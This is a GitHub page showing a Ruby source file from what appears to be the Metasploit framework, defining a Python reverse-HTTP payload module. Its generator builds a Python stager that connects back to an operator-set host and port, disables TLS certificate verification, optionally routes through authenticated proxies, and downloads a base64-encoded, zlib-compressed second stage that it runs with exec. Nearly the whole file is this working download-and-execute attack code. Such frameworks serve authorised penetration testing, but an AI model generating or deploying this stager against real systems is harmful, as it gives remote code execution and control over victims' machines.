-
Notifications
You must be signed in to change notification settings - Fork 13.8k
/
reverse_http.rb
160 lines (133 loc) · 4.81 KB
/
reverse_http.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
# -*- coding: binary -*-
module Msf
module Payload::Python::ReverseHttp
include Msf::Payload::UUID::Options
def initialize(info = {})
super(info)
register_advanced_options(
Msf::Opt::http_header_options +
Msf::Opt::http_proxy_options
)
deregister_options('HttpProxyType')
end
#
# Generate the first stage
#
def generate(opts={})
ds = opts[:datastore] || datastore
opts.merge!({
host: ds['LHOST'] || '127.127.127.127',
port: ds['LPORT'],
proxy_host: ds['HttpProxyHost'],
proxy_port: ds['HttpProxyPort'],
proxy_user: ds['HttpProxyUser'],
proxy_pass: ds['HttpProxyPass'],
user_agent: ds['HttpUserAgent'],
header_host: ds['HttpHostHeader'],
header_cookie: ds['HttpCookie'],
header_referer: ds['HttpReferer']
})
opts[:scheme] = 'http' if opts[:scheme].nil?
generate_reverse_http(opts)
end
#
# Return the callback URL
#
def generate_callback_url(opts)
# required opts:
# host, port, scheme
if Rex::Socket.is_ipv6?(opts[:host])
target_url = "#{opts[:scheme]}://[#{opts[:host]}]"
else
target_url = "#{opts[:scheme]}://#{opts[:host]}"
end
target_url << ':'
target_url << opts[:port].to_s
target_url << luri
target_url << generate_callback_uri(opts)
target_url
end
#
# Return the longest URI that fits into our available space
#
def generate_callback_uri(opts={})
uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
# Generate the short default URL if we don't have enough space
if self.available_space.nil? || dynamic_size? || required_space > self.available_space
uri_req_len = 30
end
uuid = generate_payload_uuid(arch: ARCH_PYTHON, platform: 'python')
generate_uri_uuid_mode(opts[:uri_uuid_mode] || :init_python, uri_req_len, uuid: uuid)
end
def generate_reverse_http(opts={})
# required opts:
# proxy_host, proxy_port, scheme, user_agent
var_escape = lambda { |txt|
txt.gsub('\\', '\\' * 4).gsub('\'', %q(\\\'))
}
proxy_host = opts[:proxy_host]
proxy_port = opts[:proxy_port]
proxy_user = opts[:proxy_user]
proxy_pass = opts[:proxy_pass]
urllib_fromlist = ['\'build_opener\'']
urllib_fromlist << '\'HTTPSHandler\'' if opts[:scheme] == 'https'
if proxy_host.to_s != ''
urllib_fromlist << '\'ProxyHandler\''
unless proxy_user.to_s == '' && proxy_pass.to_s == ''
urllib_fromlist << '\'ProxyBasicAuthHandler\''
end
end
urllib_fromlist = '[' + urllib_fromlist.join(',') + ']'
cmd = "import zlib,base64,sys\n"
cmd << "vi=sys.version_info\n"
cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=#{urllib_fromlist})\n"
cmd << "hs=[]\n"
if opts[:scheme] == 'https'
# Context added to HTTPSHandler in 2.7.9 and 3.4.3
cmd << "if (vi[0]==2 and vi>=(2,7,9)) or vi>=(3,4,3):\n"
cmd << "\timport ssl\n"
cmd << "\tsc=ssl.SSLContext(ssl.PROTOCOL_SSLv23)\n"
cmd << "\tsc.check_hostname=False\n"
cmd << "\tsc.verify_mode=ssl.CERT_NONE\n"
cmd << "\ths.append(ul.HTTPSHandler(0,sc))\n"
end
if proxy_host.to_s != ''
proxy_url = "http://"
unless proxy_user.to_s == '' && proxy_pass.to_s == ''
proxy_url << "#{Rex::Text.uri_encode(proxy_user)}:#{Rex::Text.uri_encode(proxy_pass)}@"
end
proxy_url << (Rex::Socket.is_ipv6?(proxy_host) ? "[#{proxy_host}]" : proxy_host)
proxy_url << ":#{proxy_port}"
cmd << "hs.append(ul.ProxyHandler({'#{opts[:scheme]}':'#{var_escape.call(proxy_url)}'}))\n"
unless proxy_user.to_s == '' && proxy_pass.to_s == ''
cmd << "hs.append(ul.ProxyBasicAuthHandler())\n"
end
end
headers = []
headers << "('User-Agent','#{var_escape.call(opts[:user_agent])}')"
headers << "('Cookie','#{var_escape.call(opts[:header_cookie])}')" if opts[:header_cookie]
headers << "('Referer','#{var_escape.call(opts[:header_referer])}')" if opts[:header_referer]
cmd << "o=ul.build_opener(*hs)\n"
cmd << "o.addheaders=[#{headers.join(',')}]\n"
if opts[:header_host]
cmd << "exec(zlib.decompress(base64.b64decode(o.open(ul.Request('#{generate_callback_url(opts)}',None,{'Host':'#{var_escape.call(opts[:header_host])}'})).read())))\n"
else
cmd << "exec(zlib.decompress(base64.b64decode(o.open('#{generate_callback_url(opts)}').read())))\n"
end
py_create_exec_stub(cmd)
end
#
# Determine the maximum amount of space required for the features requested
#
def required_space
# Start with our cached default generated size
space = cached_size
# Add 100 bytes for the encoder to have some room
space += 100
# Make room for the maximum possible URL length
space += 256
# The final estimated size
space
end
end
end